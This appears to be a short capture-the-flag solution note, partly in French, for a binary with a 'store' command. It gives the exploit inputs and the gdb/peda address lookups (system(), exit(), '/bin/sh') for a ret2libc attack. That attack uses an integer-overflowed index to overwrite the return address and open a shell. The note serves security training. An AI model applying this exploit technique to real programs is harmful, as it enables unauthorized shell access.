Input command: store
 Number: 4159090384
 Index: 1073741938
 Completed store command successfully
Input command: store
 Number: 4159040368
 Index: 115
 Completed store command successfully
Input command: store
 Number: 4160264172
 Index: 116
 Completed store command successfully
Input command: quit



**notes:**

ecrire index 0 = 1073741824
1073741824 + 114 = 1073741938
system address = 0xf7e6aed0 (peda: info function system)
system address in decimal = 4159090384
find /bin/sh
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0xf7f897ec (/bin/sh)
0xf7f897ec in decimal = 4160264172
exit adress = 0xf7e5eb70 in decimal = 4159040368
p/d  (0xffffd6ec  - 0xffffd524) / 4 (adresse ebp - adresse de buff[0])
